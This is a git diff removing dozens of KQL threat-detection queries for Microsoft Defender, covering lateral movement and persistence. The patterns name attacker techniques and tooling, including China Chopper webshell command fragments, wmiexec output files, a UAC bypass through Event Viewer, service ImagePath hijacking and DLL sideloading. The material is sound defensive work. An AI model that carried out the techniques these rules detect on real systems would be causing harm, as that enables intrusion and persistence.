diff --git a/Lateral Movement/Rundll32_Execution_Without_Parameters.kql b/Lateral Movement/Rundll32_Execution_Without_Parameters.kql
deleted file mode 100644
index 6fb33be4..00000000
--- a/Lateral Movement/Rundll32_Execution_Without_Parameters.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bartlomiej Czyz, Relativity
-// Date: 2021/01/31
-// Level: high
-// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
-// Tags: attack.lateral_movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002
-DeviceProcessEvents
-| where ProcessCommandLine in~ ("rundll32.exe", "rundll32")
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql b/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql
deleted file mode 100644
index 05e8ca0b..00000000
--- a/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/01/19
-// Level: high
-// Description: Detects suspicious Plink tunnel port forwarding to a local port
-// Tags: attack.command_and_control, attack.t1572, attack.lateral_movement, attack.t1021.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -R " and ProcessVersionInfoFileDescription =~ "Command-line SSH, Telnet, and Rlogin client"
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql b/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql
deleted file mode 100644
index 781539c1..00000000
--- a/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/03/17
-// Level: high
-// Description: Detects a suspicious RDP session redirect using tscon.exe
-// Tags: attack.lateral_movement, attack.t1563.002, attack.t1021.001, car.2013-07-002
-DeviceProcessEvents
-| where ProcessCommandLine contains " /dest:rdp-tcp#"
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_SysAidServer_Child.kql b/Lateral Movement/Suspicious_SysAidServer_Child.kql
deleted file mode 100644
index e0e0d33e..00000000
--- a/Lateral Movement/Suspicious_SysAidServer_Child.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/26
-// Level: medium
-// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
-// Tags: attack.lateral_movement, attack.t1210
-DeviceProcessEvents
-| where InitiatingProcessCommandLine contains "SysAidServer" and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_UltraVNC_Execution.kql b/Lateral Movement/Suspicious_UltraVNC_Execution.kql
deleted file mode 100644
index e5a222c2..00000000
--- a/Lateral Movement/Suspicious_UltraVNC_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2022/03/04
-// Level: high
-// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
-// Tags: attack.lateral_movement, attack.g0047, attack.t1021.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "-autoreconnect " and ProcessCommandLine contains "-connect " and ProcessCommandLine contains "-id:"
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql b/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql
deleted file mode 100644
index 11e20190..00000000
--- a/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/06/24
-// Level: medium
-// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
-// Tags: attack.execution, attack.t1059.001, attack.lateral_movement, attack.t1021.003
-DeviceImageLoadEvents
-| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe") or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and 
(not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/Lateral Movement/Terminal_Service_Process_Spawn.kql b/Lateral Movement/Terminal_Service_Process_Spawn.kql
deleted file mode 100644
index 0e46fcfe..00000000
--- a/Lateral Movement/Terminal_Service_Process_Spawn.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/05/22
-// Level: high
-// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
-// Tags: attack.initial_access, attack.t1190, attack.lateral_movement, attack.t1210, car.2013-07-002
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql b/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql
deleted file mode 100644
index 959bf177..00000000
--- a/Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Ilyas Ochkov, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
-
-// Tags: attack.credential_access, attack.t1558, attack.lateral_movement, attack.t1550.003
-DeviceNetworkEvents
-| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql b/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql
deleted file mode 100644
index b8bb4681..00000000
--- a/Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/06
-// Level: high
-// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.lateral_movement, attack.t1133, attack.t1136.001, attack.t1021.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
deleted file mode 100644
index 3f40bc3a..00000000
--- a/Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/09/02
-// Level: medium
-// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql
deleted file mode 100644
index 38313837..00000000
--- a/Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects when an admin share is mounted using net.exe
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " use " and (ProcessCommandLine contains " \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql
deleted file mode 100644
index d5e9627d..00000000
--- a/Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/21
-// Level: high
-// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " use " and ProcessCommandLine contains " http") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql b/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql
deleted file mode 100644
index a8ed798d..00000000
--- a/Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/02
-// Level: low
-// Description: Detects when a share is mounted using the "net.exe" utility
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " use " or ProcessCommandLine contains " \\\\") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Wmiexec_Default_Output_File.kql b/Lateral Movement/Wmiexec_Default_Output_File.kql
deleted file mode 100644
index e9f42bee..00000000
--- a/Lateral Movement/Wmiexec_Default_Output_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/02
-// Level: critical
-// Description: Detects the creation of the default output filename used by the wmiexec tool
-// Tags: attack.lateral_movement, attack.t1047
-DeviceFileEvents
-| where FolderPath matches regex "\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "C:\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "D:\\\\__1\\d{9}\\.\\d{1,7}$"
\ No newline at end of file
diff --git a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql b/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql
deleted file mode 100644
index 631d57e9..00000000
--- a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: high
-// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql b/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql
deleted file mode 100644
index 60ed5e82..00000000
--- a/Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: critical
-// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll"
\ No newline at end of file
diff --git a/Lateral Movement/Writing_Local_Admin_Share.kql b/Lateral Movement/Writing_Local_Admin_Share.kql
deleted file mode 100644
index 0c4f5452..00000000
--- a/Lateral Movement/Writing_Local_Admin_Share.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: medium
-// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB).
-This technique is used by post-exploitation frameworks.
-
-// Tags: attack.lateral_movement, attack.t1546.002
-DeviceFileEvents
-| where FolderPath contains "\\\\127.0.0" and FolderPath contains "\\ADMIN$\\"
\ No newline at end of file
diff --git a/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
deleted file mode 100644
index 857eb759..00000000
--- a/Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: high
-// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql b/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql
deleted file mode 100644
index df2ed998..00000000
--- a/Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger") and (not(RegistryValueData =~ "\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p"))
\ No newline at end of file
diff --git a/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql b/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql
deleted file mode 100644
index 2d468438..00000000
--- a/Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger"
\ No newline at end of file
diff --git a/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql b/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql
deleted file mode 100644
index 62bd55fb..00000000
--- a/Persistence/Add_Port_Monitor_Persistence_in_Registry.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: medium
-// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
-A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
-
-// Tags: attack.persistence, attack.t1547.010
-DeviceRegistryEvents
-| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\Control\\Print\\Monitors") and (not(((RegistryValueData =~ "cpwmon64_v40.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or RegistryKey contains "\\Control\\Print\\Monitors\\MONVNC\\Driver" or (RegistryKey contains "Control\\Print\\Environments" and RegistryKey contains "\\Drivers" and RegistryKey contains "\\VNC Printer"))))
\ No newline at end of file
diff --git a/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index 0fd4d7cb..00000000
--- a/Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: high
-// Description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.
-// Tags: attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "A;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")
\ No newline at end of file
diff --git a/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql b/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql
deleted file mode 100644
index d35ec172..00000000
--- a/Persistence/Aruba_Network_Service_Potential_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: high
-// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Persistence/Atbroker_Registry_Change.kql b/Persistence/Atbroker_Registry_Change.kql
deleted file mode 100644
index 465dcede..00000000
--- a/Persistence/Atbroker_Registry_Change.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Mateusz Wydra, oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
-// Tags: attack.defense_evasion, attack.t1218, attack.persistence, attack.t1547
-DeviceRegistryEvents
-| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"))))
\ No newline at end of file
diff --git a/Persistence/Bypass_UAC_Using_Event_Viewer.kql b/Persistence/Bypass_UAC_Using_Event_Viewer.kql
deleted file mode 100644
index 8ebc277f..00000000
--- a/Persistence/Bypass_UAC_Using_Event_Viewer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
-// Tags: attack.persistence, attack.t1547.010
-DeviceRegistryEvents
-| where RegistryKey endswith "_Classes\\mscfile\\shell\\open\\command\\(Default)" and (not(RegistryValueData startswith "%SystemRoot%\\system32\\mmc.exe \"%1\" %"))
\ No newline at end of file
diff --git a/Persistence/COM_Hijacking_via_TreatAs.kql b/Persistence/COM_Hijacking_via_TreatAs.kql
deleted file mode 100644
index 1acd1872..00000000
--- a/Persistence/COM_Hijacking_via_TreatAs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/28
-// Level: medium
-// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where RegistryKey endswith "TreatAs\\(Default)" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") or InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe")))
\ No newline at end of file
diff --git a/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql b/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql
deleted file mode 100644
index 30e0a99f..00000000
--- a/Persistence/Change_Default_File_Association_To_Executable_Via_Assoc.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects when a program changes the default file association of any extension to an executable.
-When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-
-// Tags: attack.persistence, attack.t1546.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "assoc " and ProcessCommandLine contains "exefile") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) and (not(ProcessCommandLine contains ".exe=exefile"))
\ No newline at end of file
diff --git a/Persistence/Change_Default_File_Association_Via_Assoc.kql b/Persistence/Change_Default_File_Association_Via_Assoc.kql
deleted file mode 100644
index 782118cf..00000000
--- a/Persistence/Change_Default_File_Association_Via_Assoc.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019/10/21
-// Level: low
-// Description: Detects file association changes using the builtin "assoc" command.
-When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-
-// Tags: attack.persistence, attack.t1546.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "assoc" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql b/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql
deleted file mode 100644
index 9db5f4d8..00000000
--- a/Persistence/Changing_Existing_Service_ImagePath_Value_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: medium
-// Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
-Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
-Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
-
-// Tags: attack.persistence, attack.t1574.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "add " and ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Services\\" and ProcessCommandLine contains " ImagePath ") and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " /d ")
\ No newline at end of file
diff --git a/Persistence/Chopper_Webshell_Process_Pattern.kql b/Persistence/Chopper_Webshell_Process_Pattern.kql
deleted file mode 100644
index 41494db7..00000000
--- a/Persistence/Chopper_Webshell_Process_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), MSTI (query)
-// Date: 2022/10/01
-// Level: high
-// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
-// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
-DeviceProcessEvents
-| where (ProcessCommandLine contains "&ipconfig&echo" or ProcessCommandLine contains "&quser&echo" or ProcessCommandLine contains "&whoami&echo" or ProcessCommandLine contains "&c:&echo" or ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "&dir&echo" or ProcessCommandLine contains "&echo [E]" or ProcessCommandLine contains "&echo [S]") and (FolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")
\ No newline at end of file
diff --git a/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql b/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql
deleted file mode 100644
index 89bb9dfa..00000000
--- a/Persistence/Chromium_Browser_Instance_Executed_With_Custom_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
-// Date: 2022/06/19
-// Level: medium
-// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
-// Tags: attack.persistence, attack.t1176
-DeviceProcessEvents
-| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/Persistence/Classes_Autorun_Keys_Modification.kql b/Persistence/Classes_Autorun_Keys_Modification.kql
deleted file mode 100644
index e4bc363b..00000000
--- a/Persistence/Classes_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
